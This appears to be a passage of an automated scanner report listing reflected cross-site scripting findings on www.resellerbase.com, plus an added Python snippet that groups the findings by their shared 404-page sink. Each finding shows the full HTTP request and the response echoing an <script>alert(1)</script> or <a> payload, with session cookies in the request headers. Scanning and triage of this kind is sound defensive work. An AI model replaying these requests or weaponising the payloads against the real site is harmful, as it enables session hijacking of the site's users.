The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 13ccc<a>6cb50fb4924 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/search.php?keyword=search...13ccc<a>6cb50fb4924&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/search.php?keyword=search...13ccc<a>6cb50fb4924&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1728. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c9638<script>alert(1)</script>6b69078ba8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&c9638<script>alert(1)</script>6b69078ba8e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&c9638<script>alert(1)</script>6b69078ba8e=1 was not found on this server.</p>
...[SNIP]...

2.1729. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5ffc3<a>7a961ae56db was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=25ffc3<a>7a961ae56db HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=25ffc3<a>7a961ae56db was not found on this server.</p>
...[SNIP]...
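The findings above for /detail/20/themes/kosmos/images/search.php and /detail/20/themes/kosmos/search.php are reported once per path segment and query parameter, but every one of them lands in the same place: the 404 page that writes the requested URL into its body. The following Python is an added example, not part of the report or of any scanner, that collapses such findings onto their shared sink so they can be tracked and fixed as one issue. The heading and reflected-line pairs are transcribed from the findings above; the function names and the placeholder used for the normalised URI are this example's own assumptions.

```python
"""Added example (not from the report): collapse per-parameter reflected-XSS
findings onto the single sink they share, the 404 page that echoes the
request URI. Input is transcribed from the findings' headings and reflected
response lines; nothing here talks to the host."""
import re
from collections import defaultdict

HEADING = re.compile(r"^(\d+\.\d+)\. (https?://[^/\s]+)(\S+) \[(.+)\]$")
ECHOED_URI = re.compile(r"requested URL .*? was not found")

# (report heading, reflected line of the 404 body), transcribed from the report.
FINDINGS = [
    ("2.1713. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [REST URL parameter 3]",
     "<p>The requested URL /detail/20/themes69ab6<script>alert(1)</script>fa5f29d0c/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>"),
    ("2.1717. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [Submit3 parameter]",
     "<p>The requested URL /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd77b2<a>7549e59f96c&opt=2 was not found on this server.</p>"),
    ("2.1719. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]",
     "<p>The requested URL /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&4cb1c<script>alert(1)</script>8c54d90f3f3=1 was not found on this server.</p>"),
    ("2.1721. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [REST URL parameter 1]",
     "<p>The requested URL /detaildde6a<script>alert(1)</script>99438442622/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>"),
    ("2.1727. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [keyword parameter]",
     "<p>The requested URL /detail/20/themes/kosmos/search.php?keyword=search...13ccc<a>6cb50fb4924&Submit3=Search&opt=2 was not found on this server.</p>"),
    ("2.1729. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [opt parameter]",
     "<p>The requested URL /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=25ffc3<a>7a961ae56db was not found on this server.</p>"),
]


def sink_signature(reflected_line):
    """Replace the echoed request URI with a placeholder (assumed name) so
    every echo produced by the same template collapses to one string."""
    return ECHOED_URI.sub("requested URL {REQUEST_URI} was not found", reflected_line)


def injection_point(param):
    """Where the scanner put the payload, read from the bracketed label."""
    if param.startswith("REST URL parameter"):
        return "path segment"
    if param.startswith("name of an arbitrarily supplied"):
        return "query parameter name"
    return "query parameter value"


def group_by_sink(findings):
    """Map (host, sink template) -> [(finding id, path, injection point)]."""
    groups = defaultdict(list)
    for heading, line in findings:
        m = HEADING.match(heading)
        if m is None:
            raise ValueError("unrecognised heading: " + heading)
        fid, host, path, param = m.groups()
        groups[(host, sink_signature(line))].append((fid, path, injection_point(param)))
    return groups


def triage(findings):
    """One consolidated record per sink: host, sink template, the scanner
    findings it absorbs, the paths involved and the distinct injection points."""
    records = []
    for (host, sig), items in group_by_sink(findings).items():
        records.append({
            "host": host,
            "sink": sig,
            "findings": [fid for fid, _, _ in items],
            "paths": sorted({path for _, path, _ in items}),
            "injection_points": sorted({kind for _, _, kind in items}),
        })
    return records


if __name__ == "__main__":
    for record in triage(FINDINGS):
        print(record)
```

For the six transcribed findings the output is a single record: one host, one sink template, six finding numbers, two paths and three injection points. The consolidated record is what should go to the developers, since a fix in the 404 handler closes every entry at once, while the per-finding list is still useful for retesting each injection point after the fix.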

2.1730. http://www.resellerbase.com/detail/20/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1a298<script>alert(1)</script>aac68c348d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1a298<script>alert(1)</script>aac68c348d/20/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1a298<script>alert(1)</script>aac68c348d/20/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1731. http://www.resellerbase.com/detail/20/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce624<script>alert(1)</script>460a129bd32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20ce624<script>alert(1)</script>460a129bd32/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20ce624<script>alert(1)</script>460a129bd32/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1732. http://www.resellerbase.com/detail/20/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ed61f<script>alert(1)</script>d87c2aa85c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themesed61f<script>alert(1)</script>d87c2aa85c5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themesed61f<script>alert(1)</script>d87c2aa85c5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1733. http://www.resellerbase.com/detail/20/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7a02<script>alert(1)</script>d8eb12cb671 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/search.phpe7a02<script>alert(1)</script>d8eb12cb671?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/search.phpe7a02<script>alert(1)</script>d8eb12cb671?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1734. http://www.resellerbase.com/detail/20/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f35b2<a>f8dd2ebb1da was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/search.php?keyword=search...&Submit3=Searchf35b2<a>f8dd2ebb1da&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/search.php?keyword=search...&Submit3=Searchf35b2<a>f8dd2ebb1da&opt=2 was not found on this server.</p>
...[SNIP]...

2.1735. http://www.resellerbase.com/detail/20/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d64a4<a>55c20344992 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/search.php?keyword=search...d64a4<a>55c20344992&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/search.php?keyword=search...d64a4<a>55c20344992&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1736. http://www.resellerbase.com/detail/20/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ef163<script>alert(1)</script>11ef2f1a845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/search.php?keyword=search...&Submit3=Search&opt=2&ef163<script>alert(1)</script>11ef2f1a845=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/search.php?keyword=search...&Submit3=Search&opt=2&ef163<script>alert(1)</script>11ef2f1a845=1 was not found on this server.</p>
...[SNIP]...

2.1737. http://www.resellerbase.com/detail/20/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c2377<a>dc6584ee893 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/search.php?keyword=search...&Submit3=Search&opt=2c2377<a>dc6584ee893 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/search.php?keyword=search...&Submit3=Search&opt=2c2377<a>dc6584ee893 was not found on this server.</p>
...[SNIP]...

2.1738. http://www.resellerbase.com/detail/22/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8e5d<script>alert(1)</script>60a7e29858e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild8e5d<script>alert(1)</script>60a7e29858e/22/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild8e5d<script>alert(1)</script>60a7e29858e/22/ was not found on this server.</p>
...[SNIP]...

2.1739. http://www.resellerbase.com/detail/22/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cab64<script>alert(1)</script>06218b9637b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22cab64<script>alert(1)</script>06218b9637b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22cab64<script>alert(1)</script>06218b9637b/ was not found on this server.</p>
...[SNIP]...

2.1740. http://www.resellerbase.com/detail/22/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 19423<script>alert(1)</script>edc32bce17b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/?19423<script>alert(1)</script>edc32bce17b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/?19423<script>alert(1)</script>edc32bce17b=1 was not found on this server.</p>
...[SNIP]...

2.1741. http://www.resellerbase.com/detail/22/loveme-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/loveme-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a76cc<script>alert(1)</script>d9def71cce0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila76cc<script>alert(1)</script>d9def71cce0/22/loveme-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila76cc<script>alert(1)</script>d9def71cce0/22/loveme-com.html was not found on this server.</p>
...[SNIP]...

2.1742. http://www.resellerbase.com/detail/22/loveme-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/loveme-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d031<a>be1b5a105fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/225d031<a>be1b5a105fa/loveme-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/225d031<a>be1b5a105fa/loveme-com.html was not found on this server.</p>
...[SNIP]...

2.1743. http://www.resellerbase.com/detail/22/loveme-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/loveme-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c99e1<script>alert(1)</script>2e28f4d42b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/c99e1<script>alert(1)</script>2e28f4d42b5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

